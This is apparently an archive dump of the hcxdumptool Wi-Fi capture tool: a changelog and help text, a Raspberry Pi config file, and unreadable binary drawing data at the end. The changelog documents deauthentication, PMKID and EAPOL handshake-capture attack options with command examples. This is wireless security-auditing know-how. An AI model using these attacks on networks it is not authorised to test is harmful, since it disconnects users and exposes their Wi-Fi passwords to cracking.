test.pcapng-0 -Y frame.comment -T fields -E header=y -e frame.number -e frame.time -e wlan.sa -e frame.comment 172 Mar 6, 2019 23:01:48.793212000 CET 1a:f8:7c:91:24:a3 lat:49.126337,lon:4.626268,alt:129.500000,date:06.03.2019,time:22:01:48 05.03.2019 ========== hcxdumptool: removed general info about tx-power - now we use iw style to show tx-power/channel hcxdumptool -i -C initialization... available channels: 1 (20 dBm) 2 (20 dBm) 3 (20 dBm) ... 132 (26 dBm) 136 (26 dBm) 140 (26 dBm) 149 (13 dBm) 153 (13 dBm) 157 (13 dBm) 161 (13 dBm) 165 (13 dBm) 26.02.2019 ========== hcxdumptool moved to version 5.1.3 due several bug fixes and improved rcascan status output 18.02.2019 ========== release hcxdumptool v 5.1.2 due to serveral bugfixes 02.02.2019 ========== release hcxdumptool v 5.1.1 20.01.2019 ========== hcxdumptool: added new MT76 device: "TP-LINK Archer Archer T2U" working with kernel: 4.19, 4.20 (some issues), 5.0 read more here: https://github.com/ZerBea/hcxdumptool/issues/42 https://bugzilla.kernel.org/show_bug.cgi?id=202241 https://bugzilla.kernel.org/show_bug.cgi?id=202243 11.01.2019 ========== hcxdudmptool: From now on, we assume that a packet is outgoing, if dBm Antenne Signal is absent. 08.01.2019 ========== hcxdudmptool and mac80211_hwsim mac80211_hwsim is a Linux kernel module that can be used to simulate arbitrary number of IEEE 802.11 radios for mac80211. It can be used to test hcxdumptool: load module: $ sudo modprobe mac80211_hwsim run hcxdumptool to retrieve informations about the interface: $ hcxdumptool -I wlan interfaces: 020000000000 wlan0 (mac80211_hwsim) 020000000100 wlan1 (mac80211_hwsim) bring monitor interface up: $ sudo sudo ip link set hwsim0 up run hcxdumptool: $ sudo hcxdumptool -i wlan0 initialization... start capturing (stop with ctrl+c) INTERFACE:...............: wlan0 ERRORMAX.................: 100 errors FILTERLIST...............: 0 entries MAC CLIENT...............: c8aacc9c01ec MAC ACCESS POINT.........: 580943000000 (incremented on every new client) EAPOL TIMEOUT............: 150000 REPLAYCOUNT..............: 62263 ANONCE...................: 513282ebb604e6e10c450d6c3eaa6428d118b54abeef4672be3ef700052305d5 INFO: cha=11, rx=0, rx(dropped)=0, tx=120, powned=0, err=0 run wireshark on wlan0 or hwsim0 to monitor hcxdumptool output. do not forget to remove mac80211_hwsim if the module is not longer needed! read more here: https://www.kernel.org/doc/readme/Documentation-networking-mac80211_hwsim-README 04.01.2019 ========== hcxdumptool - changed flash time: LED flashes every 5 seconds = everything is fine LED stays on = no signal received during the last past five seconds hcxdumptool - ignore double outgoing packets (rth->it_present == 0) 03.01.2019 ========== hcxdumptool: changed flash time (5 times longer on ERROR) hcxpioff: changed flash time 20.12.2018 ========== improved detection of broken driver from now on GPIO LED blinks twice every 5 seconds - if a possbile driver issue is detected - if no packets received during the last past 5 seconds another indicator is that the incomming packetcounter (rx=xxxx) doesn't increase or dmesg show this error: [65786.808078] ieee80211 phy2: rt2x00queue_flush_queue: Warning - Queue 14 failed to flush [65824.174119] ieee80211 phy2: rt2x00queue_flush_queue: Warning - Queue 14 failed to flush [67801.029527] ------------[ cut here ]------------ it seems to be a kernel issue that hcxdumptool isn't able to handle, automatically: https://bbs.archlinux.org/viewtopic.php?id=237028 https://bugs.openwrt.org/index.php?do=details&task_id=929&opened=169&status%5B0%5D= https://community.spiceworks.com/topic/2132263-ubuntu-16-04-wifi-disconnects-randomly https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1750226 https://www.raspberrypi.org/forums/viewtopic.php?t=206815 workaround: 1) get driver information $ hcxdumptool -I wlan interfaces: 7cdd90xxxxxx wlp3s0f0u2 (rt2800usb) 2) remove module $ modprobe -r rt2800usb 3) load module $ modprobe rt2800usb 18.12.2018 ========== added new option to set station MAC address --station_mac= : use this MAC address for station format = 112233445566 format = 112233000000 (to set only OUI) format = 445566 (to set only NIC) added new option to set access point MAC address --ap_mac= : use this MAC address for access point as start MAC format = 112233445566 format = 112233000000 (to set only OUI) format = 445566 (to set only NIC) warning: do not use a MAC of an existing access point in your range improved detection of broken driver set default ERRORMAX to 100 added option to set ERRORMAX -T : set maximum ERRROR count (hcxdumptool terminates when the value is reached) default: 100 errors Remarks: errorcount will increase by one, if send packet (tx=xxx) > 3*incomming packets (rx=xxx) 15.12.2018 ========== improved random generator (now seeded with and adapter mac address) Raspberry Pi: improved handling of GPIO switch 07.12.2018 ========== restore interface settings after -C improved help menu -more informations about monitor mode -more informations about packet injection monitor mode and packet injection must be supported by the driver, otherwise hcxdumptool will not work. 05.12.2018 ========== moved to v 5.1.0 (according to hashcat) 04.12.2018 ========== added new option: -C : show available channels and quit 27.11.2018 ========== added new option: --poweroff : once hcxdumptool finished, power off system 26.11.2018 ========== several big endian fixes switched to version 5.0.1 07.10.2018 ========== added new option filter mode 3: --filterlist= : mac filter list format: 112233445566 + comment maximum line lenght 255, maximum entries 64 --filtermode= : mode for filter list 1: use filter list as protection list (default) in transmission branch receive everything, interact with all APs and CLIENTs in range, except(!) the ones from the filter list 2: use filter list as target list in transmission branch receive everything, only interact with APs and CLIENTs in range, from the filter list 3: use filter list as target list in receiving branch only receive APs and CLIENTs in range, from the filter list 30.10.2018 ========== moved to version 5.0.0 05.10.2018 ========== added more error messages fixed small bug in error count on channel change failure 04.10.2018 ========== show GPS position (if activated) in status line (refresh every 5 seconds) fixed broken status display on rcascan increased speed of rcascan fixed error handling if selected channels not supported by driver if option -t is not set, skip empty channels after one second improved scan list fixed some static var 01.10.2018 ========== changed order of channels in default scan list: 1, 9, 6, 3, 11, 7, 1, 10, 6, 8, 11, 4, 1, 12, 6, 2, 11, 5, 13 27.09.2018 ========== added GPSD support (stored as comment in pcapng file) --use_gpsd : use GPSD to retrieve position add latitude, longitude and altitude to every pcapng frame device must be supported by GPSD: http://www.catb.org/gpsd/hardware.html (tested using: AktivePilot JENTRO BT-GPS-8) Retrieve GPS information with: $ tshark -r filename.pcapng -Y frame.comment -T fields -E header=y -e frame.number -e frame.time -e wlan.sa -e frame.comment write mac_ap to pcapng SHB write mac_sta to pcapng SHB SHB optioncodes: #define OPTIONCODE_MACMYAP 62107 #define OPTIONCODE_RC 62108 #define OPTIONCODE_ANONCE 62109 #define OPTIONCODE_MACMYSTA 62110 16.09.2018 ========== show warning if NetworkManager and/or wpa_supplicant is running 15.09.2018 ========== added Cisco Systems, Inc VENDOR information --station_vendor= : use this VENDOR information for station 0: transmit no VENDOR information (default) 1: Broadcom 2: Apple-Broadcom 3: Sonos 4: Netgear-Broadcom 5: Wilibox Deliberant Group LLC 6: Cisco Systems, Inc 11.09.2018 ========== You can “uncomment a line†in a configuration file by removing the # at the start of the line. Or, to “comment out†a line, add a # character to the start of the line. 001122334455 myap # aabbccddeeff ignore this mac 112233445566 second ap # this is may comment 05.09.2018 ========== added Netgear Broadcom VENDOR information added Wilibox Deliberant Group LLC VENDOR information 04.09.2018 ========== improved rcascan (show time and access points which hide their ESSID) prepare detection of PMF refactored access point handling handle 4096 access points simultaneously refactored client handling handle 4096 clients simultaneously speed up retrieving PMKIDs (< 1 minute) attack access points which hide their ESSID increased filter list line length increased filter list maximum entries added option to show beacons in status output: --enable_status= : enable status messages bitmask: 1: EAPOL 2: PROBEREQUEST/PROBERESPONSE 4: AUTHENTICATON 8: ASSOCIATION 16: BEACON added option to choose station VENDOR information: --station_chipset= : use this VENDOR information for station 0: transmit no VENDOR information (default) 1: Broadcom 2: Apple-Broadcom 3: Sonos 30.08.2018 ========== iw/ip functionality added! now hcxdumptool will set monitor mode and bring up interface! previous interface settings will be restored, when hcxdumptool terminated 19.08.2018 ========== parse SAE authentication 19.08.2018 ========== added radio assignment scan --do_rcascan : show radio channel assignment (scan for target access points) --save_rcascan= : output rca scan list to file when hcxdumptool terminated --save_rcascan_raw= : output file in pcapngformat unfiltered packets including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) 17.08.2018 ========== detect NETWORK EAP authentication system transmit BROADCAST beacon 16.08.2018 ========== From now on we store open system authentications to pcapng only if they have have a vendor specific field. we are no longer interested in standard open system authentications (payload len = 6) changed some default values: -D : deauthentication interval default: 10 (every 10 beacons) the target beacon interval is used as trigger -A : ap attack interval default: 10 (every 10 beacons) --give_up_deauthentications=: disable transmitting deauthentications after n tries default: 100 tries (minimum: 4) affected: connections between client an access point deauthentication attacks will not work against protected management frames --give_up_ap_attacks= : disable transmitting directed proberequests after n tries default: 100 tries (minimum: 4) affected: client-less attack deauthentication attacks will not work against protected management frames 13.08.2018 ========== increased some attack values: --give_up_deauthentications=: disable transmitting deauthentications after n tries default: 100 tries (minimum: 4) affected: connections between client an access point deauthentication attacks will not work against protected management frames --give_up_ap_attacks= : disable transmitting directed proberequests after n tries default: 100 tries (minimum: 4) 07.08.2018 ========== moved to 4.2.1 added communication between hcxdumptool and hcxpcaptool via pcapng option fields: 62108 for REPLAYCOUNT uint64_t 62109 for ANONCE uint8_t[32] enabled hardware handshake instead of software handshake changed beavior auf status: --enable_status= : enables status messages bitmask: 1: EAPOL 2: PROBEREQUEST/PROBERESPONSE 4: AUTHENTICATON 8: ASSOCIATION Now we use a bitmask to deliver status messages. 06.08.2018 ========== write ISB (Interface Statistic Block) at the end of a cpature 04.08.2018 ========== addet new option (--disable-active_scan) to hcxdumptool --disable_active_scan: do not transmit proberequests to BROADCAST using a BROADCAST ESSID 04.08.2018 ========== release hcxdumptool 4.2.0 complete refactored: -various new options -measurement of EAPOL timeout -full support for hashcat hashmodes -m 16800 and 16801 -now default format is pcapng $ ./hcxdumptool-bleeding --help hcxdumptool 4.2.0 (C) 2018 ZeroBeat usage : hcxdumptool example: hcxdumptool -o output.pcapng -i wlp39s0f3u4u5 -t 5 --enable_status options: -i : interface (monitor mode must be enabled) ip link set down iw dev set type monitor ip link set up -o : output file in pcapngformat management frames and EAP/EAPOL frames including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) -O : output file in pcapngformat unencrypted IPv4 and IPv6 frames including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) -W : output file in pcapngformat encrypted WEP frames including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) -c : set scanlist (1,2,3,...) default scanlist: 1, 3, 5, 7, 9, 11, 13, 2, 4, 6, 8, 10, 12 maximum entries: 127 allowed channels: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14 34, 36, 38, 40, 42, 44, 46, 48, 52, 56, 58, 60, 62, 64 100, 104, 108, 112, 116, 120, 124, 128, 132, 136, 140, 144, 147, 149, 151, 153, 155, 157 161, 165, 167, 169, 184, 188, 192, 196, 200, 204, 208, 212, 216 -t : stay time on channel before hopping to the next channel default: 5 seconds -E : EAPOL timeout default: 100000 = 1 second value depends on channel assignment -D : deauthentication interval default: 20 (every 20 beacons) the target beacon interval is used as trigger -A : ap attack interval default: 20 (every 20 beacons) the target beacon interval is used as trigger -I : show suitable wlan interfaces and quit -h : show this help -v : show version --filterlist= : mac filter list format: 112233445566 + comment maximum line lenght 128, maximum entries 32 --filtermode= : mode for filter list 1: use filter list as protection list (default) 2: use filter list as target list --disable_deauthentications: disable transmitting deauthentications affected: connections between client an access point deauthentication attacks will not work against protected management frames --give_up_deauthentications=: disable transmitting deauthentications after n tries default: 10 tries (minimum: 4) affected: connections between client an access point deauthentication attacks will not work against protected management frames --disable_disassociations : disable transmitting disassociations affected: retry (EAPOL 4/4 - M4) attack --disable_ap_attacks : disable attacks on single access points affected: client-less (PMKID) attack --give_up_ap_attacks= : disable transmitting directed proberequests after n tries default: 10 tries (minimum: 4) affected: client-less attack deauthentication attacks will not work against protected management frames --disable_client_attacks : disable attacks on single clients points affected: ap-less (EAPOL 2/4 - M2) attack --enable_status : enable status messages --help : show this help --version : show version 01.08.2018 ========== moved some stuff from hcxtools to hcxdumptool repository prepare complete refactoring! 04.03.2018 ========== hcxdumptool: added new option -W -W : WEP encrypted packets output file in pcapformat including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) 04.03.2018 ========== hcxdumptool again complete refactored: 02.03.2018 ========== hcxdumptool is complete refactored: - improved scan engine - improved authentication engine (incl. Radio Measurement, and NULL frame detection) - dropped timer - use threads for LED and channel switch - use only one file descriptor for raw socket operations - working on Intel Corporation Centrino Ultimate-N 6300 (rev 3e) WiFi adapter (kernel >= 4.15) - working on Alfa AWUS036NH, Alfa AWUS036NHA - working on Alfa AWUS036ACH (driver: https://github.com/kimocoder/rtl8812au) - more channels allowed (depends on installed wireless regulatory domain) - simple usage: hcxdumptool -i -o dumpfile.pcap -t 5 interface (real interface - no monX) must be in monitor - all services/programs with access to the interface must be stopped! - new format of blacklist - and more... reported to run on Gentoo https://github.com/ZerBea/hcxdumptool_bleeding_testing/issues/2#issuecomment-369256915 reported to run on OpenWRT/LEDE https://github.com/ZerBea/hcxdumptool_bleeding_testing/issues/3#issuecomment-369756725 reported to run with Intel Corporation Centrino Ultimate-N 6300 (rev 3e) https://github.com/ZerBea/hcxdumptool_bleeding_testing/issues/2#issuecomment-369259800 $ hcxdumptool -h hcxdumptool 4.1.0 (C) 2018 ZeroBeat usage: hcxdumptool options: -i : interface (monitor mode must be eanabled) ip link set down iw dev set type monitor ip link set up -o : output file in pcapformat including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) -O : ip based traffic output file in pcapformat including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) -c : set scanlist (1,2,3,... / default = default scanlist) default scanlist: 1, 3, 5, 7, 9, 11, 13, 2, 4, 6, 8, 10, 12 allowed channels: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14 36, 40, 44, 48, 52, 56, 60, 64 100, 104, 108, 112, 116, 120, 124, 128, 132, 136, 140, 147, 151, 155, 167 -t : stay time on channel before hopping to the next channel default = 5 seconds -T : terminate after maximal errors : default: 1000000 -D : do not transmit deauthentications or disassociations -R : do not transmit requests -A : do not respond to requests from clients -B : blacklist (do not deauthenticate clients from this hosts) format = mac_ap:mac_sta:ESSID 112233445566:aabbccddeeff:networkname (max. 32 chars) -P : enable poweroff -s : enable status messages -I : show suitable wlan interfaces and quit -h : show this help -v : show version 27.02.2018 ========== Now recommendations since we are run into heavy problems with latest drivers and operating systems * Operatingsystem: archlinux (strict), Kernel >= 4.14 (strict) * Raspberry Pi A, B, A+, B+ (Recommended: A+ = very low power consumption or B+), but notebooks and desktops could work, too. * GPIO hardware mod recommended Supported adapters (strict) * USB ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter * USB ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter * USB ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter * USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter * USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter 25.02.2018 ========== - initial start of this repository - added hcxdumptool - added hcxpioff hcxdumptool-6.3.1/docs/000077500000000000000000000000001444752163100150265ustar00rootroot00000000000000hcxdumptool-6.3.1/docs/config.txt000066400000000000000000000005561444752163100170420ustar00rootroot00000000000000# See /boot/overlays/README for all available options gpu_mem=64 initramfs initramfs-linux.img followkernel max_usb_current=1 hdmi_blanking=1 dtoverlay=pi3-disable-bt dtoverlay=pi3-disable-wifi dtparam=audio=off dtparam=watchdog=on disable_splash=1 tparam=pwr_led_trigger=none dtparam=pwr_led_activelow=off dtparam=act_led_trigger=none dtparam=act_led_activelow=on hcxdumptool-6.3.1/docs/gpiowait.odg000066400000000000000000000344511444752163100173530ustar00rootroot00000000000000PK}D%SŸ.Ä++mimetypeapplication/vnd.oasis.opendocument.graphicsPK}D%SConfigurations2/floater/PK}D%SConfigurations2/menubar/PK}D%SConfigurations2/popupmenu/PK}D%SConfigurations2/toolbar/PK}D%SConfigurations2/toolpanel/PK}D%SConfigurations2/accelerator/PK}D%SConfigurations2/progressbar/PK}D%SConfigurations2/images/Bitmaps/PK}D%SConfigurations2/statusbar/PK}D%S styles.xmlå\Ír#·¾ç)Xt%·ÑðW™Õºì8»IÕjò®9¹À„La0¢´/‘c^Æ7¿Iž$¿!† AŠ’E®²Mt㧿þÐhòÍ·÷+ڹü ,»éö/zÝΖ’lqÓýùó»èºûíÛ?¼aó9Ið4eI¹Â™ˆ ñ@qÑÎY1ÕDÆØMw)D>c–ãL·^0¾ˆ½Þ$ÖŸ»¦ÊÈê¦[òlÊPAŠi†V¸˜Šd*»Úi¦^$`Sµ>ÝX¬ @òF [å0ÊŒbw˜œãÕð¡Ã¹}ܱ’¢Š ƒõz}±*ù?ÿKZ$ð½ˆ-7ÏE ^ã˜ãœqa¹Ó¤bÎKN[šÄ˜b¹°"î_ô«‘“%â"TÅ\önŒëÝÂkÊÑ:tÉ ææv—@…v—¼n_°Ã¤ØQœ šTÂJ;W2oMµnj͉Àܲ¯°@¡sI^wª{J²/M¶ÕŸL&±¢ZÖ9 ä¾ ÑœyTØîÏ£-ÖŸB'6á¤f0Ã4Ü`†iÍZÐ,\‰ŠÙí•«æÁs#ví`.8ôTŽ –¸±t¾¨â뜕Yªã‹ ßç˜IBTu›ÖFØAc_0VL®³¶vè÷bÉcùé%~W <ÿý7Já©ÚÍyŽ ñª N€p  vÁoæêÏ ¼T„DýÕúÈ(™D€Ðý^ïN§f X‰œ}ØKñÂ4ÍOåî ÒïF‡«]©aÞuý¶ŸœÍ,܈ Ê6Ô]1tŽ‘údÐòF‡È÷7Œd¸MBÃrN2’QR« þ\Òý߸K¯Õ]zgcJ“ËcÝÅ#aå.ç#ãÕà(wñ©P¹ËóH¶â÷õ©ݳ÷l¦†!|>³‹[0ŒŸ–(ÇÅáz}àÙhçxfKT\ôm[T«X Z#÷Âjo˜3FÓp4ÞÁ*°÷ Û†A1Ìè$w+ \¼ôâïié9¦kžŽË.¥A'DʪÂÂ6½n×mågTÚè`ÞsŒ³Vdj/®¯{,6g ŽPÔO/lTÓOÇxéé”$«_À|ÿ‰)Un~`ê,/bÀ²0öÙÀùQ§fŸ.fï¯Kºè]÷=µIOËñÚ£ºå:2®WXÛ¨K¶CTm«»O¢ê=¼ãÈP~$¦ 9 [û|24¼Ñ²Ââ¨xy$¦Ê9 [}2$Ú"dƱ12À„ ©ûÁÈ~EàQ}€u?Ã)ß/ð£#¡ªí6IhOT,—.©hŸœnùhUn~Há)ÎÒÆ~žzÓbÉÖQ™aÃGëT,}ÑAãUç85bÖ2R˜å˜‡dJú\ÜÁÏ-Û{²»jWí5ÉúíÓk"CýB~(šú½ö)á4Âw¤ *7ñ$UÄÁ’‹–Wóy{’«œ±ôá%WêÝ†Ü ËAiS+•¬fŸ“c"Ì©¥óÕ¹è¯ÑÔkïS×®œ¯óÔkql…S 2×ÿò(œò¹L‰Ô ™¼é鞎ƒÏsýHïbOó²§Ô1xòÊŠÍí~ó™­'‚$™LÎK!N®gٮٻè{ªö*Bƒ~+ÜÓJ´™,1JéQûgŽ¯ÍÑÀç ŽÑaŽa1z‘Põr Õ {÷±Ð=QX9[èF 5žD€“'Et…QQòçð×ÀœÃs_ÝÝzïòA:j|Ç·~›Ä|”ß—¿á—D–`q^à.þ¬5-ýã¶×mài1=Ï6±Õ¬7 ~ãd[Õ|¸Aÿb óˆÙãÅkB(ƒJ‚Ñæ$[wôm»/"®@ÿûõûþ.L<:FQziå<+äÖó0#yÙP~Kœí󘓾Æ!S¶ÐZïù;//—Œ’çv»8wn·‚Ô rïné(Œ–ÖTŸ%ÃRvFÛ祵æp¬©û^ì·Æ–q¸Ø\F<uwPÔ]ÑÄiÈ“°ô–Êb´ƒ‹£ô{q~³Þ.¿— ¹/buC!<ŒY泪OK×57H,O ²Å»YDNÜçN÷ÉM˜/–M‘gš›å†S>Ø*ÍÄ.Óóm{Ù}T:ƒKŒm=aâc7NÔ/Öƒ ÀÐMC“Pºyo„AøI"„PÂá-C¹6ã0–!8Q“b ߌ{ˆßÁqün‹Ø+w‚:tôkÚÉ/×ïûw›¥Ù1¾±~e‹°¢Æ,¶A½ê^)µÿzS´zÛÌkªQ ½mØÐùºñüP B?.Þ¾©Ê¡mVªÏLÓ«ÕûˆÖÏ åƒ—RYô–ÑÒ‰ÇÃÕê×^FŠßŒèªÆ•2šÑ«Û0¥á¥Ÿ“ÄKYTú44·^ñìÖ—«F‡Ü,Ò>‰r{? <î å›4¢³ÎP¬ß”vŠÅCQ†É):^{éÖ‹gÔj;Sú—¤$‡sª¥xŠ€}í퉉.mÇ©ÎÐEõW·{û’°¥€¯òqÚÂä×®AZaµ–õLͼmÏÔ)ë6Ÿ°ns/ÛE~Óœy9[ñjÅÄæ½—«fÜšEÍ((‡y…÷[QæäûNGbBïÇŸüßJaºQÐŽéô>%iX7°iå©;’G?÷ªG[Š_ßí‹2Ú<Œ o™(¿#K"ºÈh†cÞS·9¹Swa´ÝQÐÝxqA{7dDiÛjhÀ0ý¤m¿‹v?0h‹QÏo‡œljܒʋ¯¤ýÊZÒ ÿwÜãq¸)…Ž,óýÔ˵ߪ¾‘fB4ãc aTù¹õ’ǽ0H$ÞÅ&Þ,Ÿ †T½\-odâƒ1>ÇòQBMó—^‹:½ñ/Û‰@³ñÉ>´ä}Hn¾ ýò.*wd_2g-±ÇN¯$ûÈj`¶ÐžK|ÄÇÐl§ñ¡+AŸ&>î%>âƒ4Œ­i|ͲŸ(>À¸H¾€†ÀSè‘ÖUÏ$@Êff)@ö…ç²bû¨›ÍÃözÌ%Û§ Ái¦c=Q€i±úL$˜b»šaºO ¯&÷ŸVõ~µ_³`avXOjshãA?dû2:N@ø£tÇ|¹&´ékòˆ˜Ñr¹‰—oib±´­Ö÷½Æ¼ž [K’MÚnHY²½º¦9ŽÒ°» Æ«ÖÆ( ¨y‚g |×>ŽŠºà‡›`Õ'ˆÃÛ0®qáfÇa©T¬ ]U«.•g¸Zýøßÿ´é Òóça•{7´§½c àÛ1tãàáþ ’Òîvì‹Ž•´Ü9eamÍóÆ"úšiâ/¸_Y*áx‚ŠŒí'Ü„’‡žŸ‡ÐÙ<4ø,=džÑCγô>›‡ f>KYgóz–þ±ÏçŸgŠÓÎÙSœvÏè¡ç‰Óìç™\„?- îu×sm]xB¤î¸!ÁCû¡> òö _&±!Õ‚©š›³Ï`Õ¬º»¥:?SÂ[¯ k~’¤îûÐ-ã9…¿/¨"j±ó²p:?bÒ.¾Ï¾jzbïÙ¤?Ⱦ¬üm<øsBÖÒ=Üm›îÙCwl€æ3Dâ urez­e˜îØqí@݆$ Ëüs°Cç¿#tC1,£¾ÖŠmã}¨f$JË‚å c02,T] ¥jã€c"»n¨Fª[øµná½U cê{†=— RºÑ{ì ÝCFÝÆq”Í·µ+ã'¿idL®TMËPþ¡|É“n¹ŸG0MËíÓÔºÄò“Œ¥«9&¼ó ¦mëò²?M,ï“xW«(°j²á§ €.Eûs ô¢i\ªö¹j¦Æ¥y™ýÔ  ÏhdƒqÙ^0ø-[¤Ù—²}FÑ´.µùs‰fÂ`Âç4ÖŒê{Aý²5/þ4ËÖÔ\ŽËöÂÍMNc3F( ã’™‘ƒÑ8€.¦5,Ë };©7侉ê[P?=ÏÚصè#½3­IZ’¦¡_’|ÎT$4‰M½Üˆ;l=p©h`Eºikq4«rO­‹——ULúW5w É°!(0^Lå*QY·*ĶµSM@3l¼šæ¹ Ó°_"úÐ+ KÛ\†áx€áøhº€iÍ;ƒGÉýY°µÇ-÷aõ˜ª–™~·ÁPi.ˆ_\ìÓf†Ñ& sÊ„Ív¬QI_·*¼§c™ô¿SÿtY9+×ô7`° à€ÉL.`DwT»Ø¸ô/-düq*ÈF€˜]/´;*Æ]N…Ø° ãE¨¥BŒኊ@^/ê´7¿Yio²L¦½ÉxÍN{“ñ›•ö&wÓ3^\i??ÚlV—úšìø×¾zMÿTåì¦=tJòd{W«Ï e¥âcžêQ>8#I…6M€ƒlhÌF ¼ÂÔXÝ6!>ÌlN™‘òšÂÆ¡xÌ ñq­©<¬¼‚.QÖž2[TYpDWgª+M„×ï6öeÝYFõ8#˜$Í Ÿ/LüêEéÀ1^¾|õÂPùp/_Q:êªäTÝ/_W€rXà$çÔÓa›!Õ©2ò'Ù:c"Ã#±• ±¤DN2}ÎÈžÌ;¥eN ä#ÌtåDNjëcÌ””9©Kn¦kvØ%Ÿ>“Z®Œœ—¨N•‘—8Ç‘÷J&Ï@æŒGò4™pzäÌ”K(93%eÎÃ@bˆõI'À@¦:£¼Ìyø ;ç¤[2…$–:g«´Ôy’5U20$kª¤Ôy(¢£‰“×9 ý Š2Õ}¤e¢y( ;‰è¸[.ŒÄRçl•–*€#ISåÒ‰IÒTI©ó¡yG}ò‰$$LuFy™óp4vÑI·d àH,uÎVi©óp$kªd IÖT9©æ<$ÑE¶8yíÓPÐ’@¦:£¼Ìy8 ;‰è¸[.L‰¥ÎÙ*-UG’¦J¦‘$M•”:Iˆ‘wÔ'ŸH@ÈTgô‘—9G£aÇtK¦‘ŽÄRçl••ŠçáHÖT¹4Â@’5URê’çEì§ð9Št"á ÍÝ×F2O7à UCôŸŒî¼4ˆë­“êw5#ET½¦ÿóáBÝŸ{é6TïÕ$J£dŸ\­øsáyï¾"ád»m½ÉÞÇ »· þÙâi|1ü$µ± {[<®Ö?Ý\íl1ª˜<ôKêÄX°‰zÍ·}Þ×ìÃMŸîçé[ã ‹Î=°¹Ì¹ ÚY} ï&Qž“¼÷ Žö]†ýîæ%€ÃΧÌãìÿBÍé"ü8và`ÿi&îoÿÂú+êµ"ƒÍ_8hîoþ‚n³0èèQ¯±O {[Ū¨@“ªµÃ¶{«"äÀ™Mbì íB v‰Å—®æâ'6ñ£5ò£]±ÌyÒz²ç×Å,‰ aÜbÓÙ! Œ[61š8‡ö»Öc:§«{Pÿö‘ähë»sœ98¤P@à/šõzÎèe2©ë€Ë\§bÃÞ9ì$Âœë+àãžcï+™sšu4zÆìáàfÛã“#·ŒŽÔë­bOšúãºÚðüˆ]Ù!—ö³øøaj¤4À†±S-lÌÄÙÂ@¡ýà©ñ£ ‘Z|Þñ›!èNŒþÝ „‰Ð~¦.'ƒå éXB7›sn¶nî Jò=ðV5-î f.Ÿ+)ÚÓ¢·„£¾ï²…~þÈã]PCŽÙŸu°÷±£á¼Ã¨Kw’ûG¼Ðäˆ×´Å9ô%4Þ9Áx aÇÆšk¦\£ ­}èl›ñýYÌrO0ËÕ€=1‹Nf€Ý3 kôØ·‹ÎÌC§öÞÿñÊ‹˜Ü©þ>gï{9 (]LÝyy ü¾"XÓäV’ß*ºxq•.øÌoÿPKÜ9ºwÃyPK}D%S settings.xmlÝZ[sÚ8~ß_Ñaº3»³“b“d·fvÌC/ÙXE–<’¡¿~ iS„Úxggó@@–¾ïèèøÜì¯=úf……$œÝÔwJá f6w[ÜÆfóê}áïÊ/ø|Nl\v¸z˜WL‘o`9“åíeÎù]Á ¿\,r³íè;.Å’¢hÅíïÂn bÄ»+„‚•9’D–ò°,v9^úDTþ> b9‘p;(=Bψç^ÙÜóÅ¢ø9Œ/°„‰ ü¹pÏ×<Dz9›“Ź(ÛÙÏׯ)aËo:Œ¢è]tèOÕ4­˜\}šzZÙ7{ÊÞþ:W°Ýi'‚í¾?3‘ëBåɞ̠òa·—í¿+`/¶‘7»á˜ì®"—WG߬§phÝk&DƦ ŒLîž..*W7×ʇâKœŸÂîâyp\½-Ýü•þ8{ÿ¶ô—ú>3|“…{Pþ’¦*7çâ_yÈ¿"ÌÁkììsáèði%kÀrÄæ‰qÔqöÄ”S(TbÃPÓi¢%ˆÓ‘;}ìÁ[œSŒX¡2GTâ,øMÁÙ¾Ž/Þ‘#†|“Ç,9ÂÐ÷X&±"ÌHv ÃG).°‘{ë ¶ƒ¦€ÁÜYî¢|63 ¡l#æP,u¡MŽöÛ.|© ´Á½FOz hPâ†<àt“¨­ ÓrLê­’ÒkwäK®<Žhw]´Ð·$þó¦ BˆM¡ÒŽîîÒq À÷(o–.·—Øy¢ø:TŸë8l+…÷ySþRÄìÆi„‹W#DzüØ·~‚À¹Ú\.ÀÔSÚùSð@؉Á/ Ü‘‰)ô¸“ƒ*:²ÎCPr{iâuÐpÈѨ™…&!¨¹ˆ-°Á·™øåiF”8X°0xtø ÎN®öÜ%håÀ$®1{6ûÍ”µœ3åÛôùa#!ñQéU%m¸û~\ölèMHØN ž ù¤Ôé¡ã,-zÚ‡ÊU €‹Ëkæ;I ì$ç8Fs’Çc'9í¤#“T/æi°8£É£–‰ÑsÈ(gœ{÷ì@œ½@Ñ™ ;q(¼_a1§<êâ²7?Ïu`ðyù}ìò®¢?k}¿%C,7ß·Hw2mØù9d7mÆø –xÍAÈì µ—>u`l\o¨=sÂÔ]ïé«èÛÒ†®»£ø¿#O#F«©<ŽôuU7èáV™M;Ú¨YKš´®?ÎÍVóëlúñÓlj̇ª¾î› ÕZø+Û£Ôb†ë´èÊú¢a®b{MßÑý/ÖuÕŸM{ZoßKkù85èàaæZí>­yªk{ŽoyÍ%b“¯NKœ¡Ö«EQ·®Ëžž¬|ƒÚmƒÌŽ²}µZ“Òì!Òàz4kÍ–³éÌ,Ÿ8’ùŽG¿ÌL%ªÑêÐhÀY2ƒâ¶Ñ~ÆÜYib¢©Oï— %Þ¾ÞèÌIµ:ijɤÚ3&îÜk cø^7Ú“8oÌm93ùŸfiæ¥lî¡6]pu šÃ£€Ÿl_bºg5Êe±odC{­Ãšút‡8ðØw ß‹Œ‰=ŸžÈý~®3™t‹/^+{•°òPK9Q)ÈŒ(PK}D%SÅ[úãÛ Û Thumbnails/thumbnail.png‰PNG  IHDRÆ߃ùr®PLTE ###444<<¥äôÂ1rKÑx·F)MÑÜò¹ˆ“M*ºàjÌy[~£²äÜl‰h¯9S³ Õ»ê)L¼¥8KÆкÙM)Ù Ê 